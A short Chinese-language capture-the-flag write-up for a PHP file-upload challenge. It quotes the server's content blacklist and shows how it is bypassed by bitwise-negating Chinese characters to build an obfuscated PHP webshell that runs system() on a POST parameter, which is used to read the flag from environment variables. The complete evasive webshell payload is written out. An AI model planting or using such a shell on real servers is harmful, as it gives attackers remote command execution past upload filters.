显眼的注释,但是访问是404:

<!--/.nav-collapse -->
<!-- /.container -->

👴火速去康康显眼的upload,分析代码得知这里搞了个黑名单需要绕过:

if($contents=file_get_contents($_FILES["file"]["tmp_name"])){
    $data=substr($contents,5);
    foreach ($black_char as $b) {
        if (stripos($data, $b) !== false){
            die("illegal char");
        }
    }     
} 

fuzz了一下,限制的是上传文件的内容:

参考p神利用取反来获取可用字符:

<?php
error_reporting(0);
$a = ~垂;
echo $a."\n";
echo $a[1];
/*
运行得:
a}
a
*/
?>

🐎一下汉字:

echo ~茉[$____];//s
echo ~内[$____];//y
echo ~茉[$____];//s
echo ~苏[$____];//t
echo ~的[$____];//e
echo ~咩[$____];//m
echo ~课[$____];//P
echo ~尬[$____];//O
echo ~笔[$____];//S
echo ~端[$____];//T
echo ~瞎[$____];//a

构成🐎,POST参数a:

<?=$_=[];$__.=$_;$____=$_==$_;$___=~茉[$____];$___.=~内[$____];$___.=~茉[$____];$___.=~苏[$____];$___.=~的[$____];$___.=~咩[$____];$_____=_;$_____.=~课[$____];$_____.=~尬[$____];$_____.=~笔[$____];$_____.=~端[$____];$__________=$$_____;$___($__________[~瞎[$____]]);

访问环境变量得到flag: